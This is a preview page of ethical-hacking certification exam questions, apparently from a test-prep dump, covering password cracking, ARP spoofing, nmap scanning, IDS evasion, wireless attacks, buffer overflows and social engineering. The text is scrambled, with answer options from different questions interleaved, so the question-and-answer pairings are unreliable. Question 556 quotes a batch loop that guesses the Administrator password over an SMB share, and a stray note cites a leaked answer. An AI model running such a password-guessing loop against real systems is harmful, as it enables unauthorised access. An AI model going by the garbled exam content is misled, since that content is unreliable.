Eve is trying to carry out a password crack for user Administrator D.txt) do net use * \\10. 2005 US-SPAM 1030 Act D. Password sniffer B.The problem Daryl is having is that his users are forgetting their passwords quite often and sometimes he does not have the time to get into his applications and change the passwords for them.1. True IDS Sensors to look for large amount of ARP traffic on local subnets C. Daryl wants a tool or program that can monitor web-based passwords and notify him when a password has been changed so he can use that tool whenever a user calls him and he can give them their password right then. A. Eve is trying to connect as an user with Administrator privileges B. Use private VLANS D. She notices that Alice is using a computer whose port 445 is active and listening. Eve is trying to escalate privilege of the null user to that of Administrator 557 How do you defend against f? A. 1990 Computer Misuse Act 556 Eve is spending her day scanning the library computers. L0phtcrack C. what would be one of the last steps that would be taken to ensure that the compromise is not traced back to the source of the problem? A. Eve uses the ENUM tool to enumerate Alice machine. workstation and routers B. 2004 CANSPAM Act B. Setup a backdoor 123 . 2003 SPAM Preventing Act C. From the command prompt. John the Ripper D. Eve is trying to enumerate all users with Administrative privileges C. For /f "tokens=1 %%a in (hackfile.2. Install pactehs B. What tool would work best for Daryl's needs? A. Place static ARP entries on servers. WinHttrack 555 Which of the following act in the united states specifically criminalizes the transmission of unsolicited commercial e-mail(SPAM) without an existing business relationship. she types the following command. Use ARPWALL system and block ARP spoofing attacks 558 After an attacker has successfully compromised a remote computer.3\c$ /user:"Administrator" %%a What is Eve trying to do? A.

However. You are in hurry and conducting the scans at the fastest possible speed. choose the exploit against which this rule applies. DWZ host D. 563( hoi thay them) pass4sure dap an la A Ron has configured his network to provide strong perimeter security. D. Create a SYN flood. WEP attack 562 An employee wants to defeat detection by a network-based IDS application. If stealth is not an issue. Rouge access point attack B. Which of the following strategies can be used to defeat detection by a network-based IDS application? (Choose the best answer) A. SQL Slammer C. As part of his network architecture. you put up an access point and override the signal of the real access point. IIS Unicode 561 In order to attack a wireless network.C. Install a zombie for DDOS 559 You are performing a port scan with nmap. War Chalking D. B. what do you infer from the attack? 124 . What would you call such a host? A. What kind of attack is this? A. what type of scan should you run to get very reliable results? A. Create a multiple false positives. C. DMZ host C. Create a covert network tunnel. WebDav B. he has included a host that is fully exposed to attack. He does not want to attack the system containing the IDS application. XMAS scan B. MS Blaster D. Honeypot B. Cover your tracks D. Fragmented packet scan 560 Study the snort rule given below: From the options below. The system is on the public side of the demilitarized zone. A. As users send authentication data. Stealth scan C. you are able to capture it. Bastion Host 564 Given the following extract from the snort log on a honeypot. Connect scan D. you don't want to sacrifice reliability for speed. Unauthorized access point attack C. unprotected by a firewall or filtering router. Create a ping flood.

Jason. How would you describe Jason's behavior within a security context? A. The exploit was not successful 565 Within the context of Computer Security. A government agency since they know the company computer system strengths and weaknesses C. 566 In Buffer Overflow exploit. temps. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. Tailgating C. Canonicalization B. Character Mapping C. Trailing B. Social Engineering is the act of getting needed information from a person rather than breaking into a system. C. D. Character Encoding D. Disgruntled employee. EIP B. contractors. A new user id was created C. which of the following statements best describe Social Engineering? A. vendors. and consultants D.A. Swipe Gating D. Smooth Talking 568 _____ is the process of converting something from one representation to the simplest form. UCS transformation formats 569 A majority of attacks come from insiders. Social Engineering is a training program within sociology studies. A. business partners. which of the following registers gets overwritten with return address of the exploit code? A. A competitor to the company because they can directly benefit from the publicity generated by making such an attack 125 . an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. EAP D. suppliers. Social Engineering is the means put in place by human resource to perform time accounting. EEP 567 Jake works as a system administrator at Acme Corp. The exploit was successful D. Social Engineering is the act of publicly disclosing information. The CEO of the company because he has access to all of the computer systems B. ESP C. B. customers. Who is considered an insider? A. A new port was opened B. people who have direct access to a company's computer system as part of their job function or a business relationship. It deals with the way in which systems convert data from one form to another.

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->